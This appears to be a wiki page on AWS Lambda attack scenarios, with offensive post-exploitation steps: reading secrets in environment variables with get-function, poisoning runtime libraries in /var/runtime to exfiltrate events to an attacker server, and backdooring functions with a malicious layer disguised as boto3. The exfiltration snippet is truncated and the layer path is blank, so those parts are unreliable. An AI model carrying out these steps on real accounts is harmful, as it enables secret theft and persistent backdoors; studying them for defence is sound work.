Lambda - Security

Following are some interesting security senarios :-

Senario I - Env Variables

You have got access to Keys that has "GetFunction" permission, then its possible to view Environment variables of the lambda and even download the lambda function.

Permission needed : GetFunction

Command :

aws lambda get-function --function-name testDemo

The output will contain all the environment variables that were configured with the lambda.

Senario II - Runtime Leakage

We have sucessfully compromised a Lambda which runs once every 10 mins and wants to leak all the events passed to the lambda.

There are 2 ways to poision a lambda :-

  • In case lambda function is using any import library, we can poision the respective library present in /var/runtime since these are refered by lambda whenever function is executed.

  • In case there is no import in the main lambda code, then poision file at /var/runtime/ since this file is refered every single time lambda is executed by the init processor.

In order to leak out the even best way would be add couple of lines

import urllib3
http = urllib3.PoolManager()


Above code will query the Runtime and get the current even and pass on the data to the attacker server hereby exfilterating the event.

Senario III - Layer Backdoor

We have compromised a Lambda and have full access to the function and now want to backdoor the function. In order to backdoor it, we can add a malicious layer to the lambda function.

Creating a Layer

In order to create a layer, we first need to create a malicous file that can be later refered by the legit lambda code. For instance if the language is python then we need to create a zip with the our malicous file. The zip directory info should be python/lib/python3.9/site-packages/.

In the above example we have created a malicious zipfile which behaves as boto3. We now create a new lambda layer using the above zip file.

aws lambda publish-layer-version --layer-name MyLayer --description "Backdoor layer" --license-info "MIT" --zip-file fileb:/// --c
ompatible-runtimes python3.9 --compatible-architectures "x86_64"  --region us-east-2

Attach layer to Function

Once layer is ready, we will attach the layer to the target function

aws lambda update-function-configuration --function-name securitylabs-lambda --layers arn:aws:lambda:us-east-2:123456789012:MyLayer:layer1:1

Now, anytime the function is executed, our layer code will also be loaded and executed prior to actual function execution hereby backdooring the function.

Last updated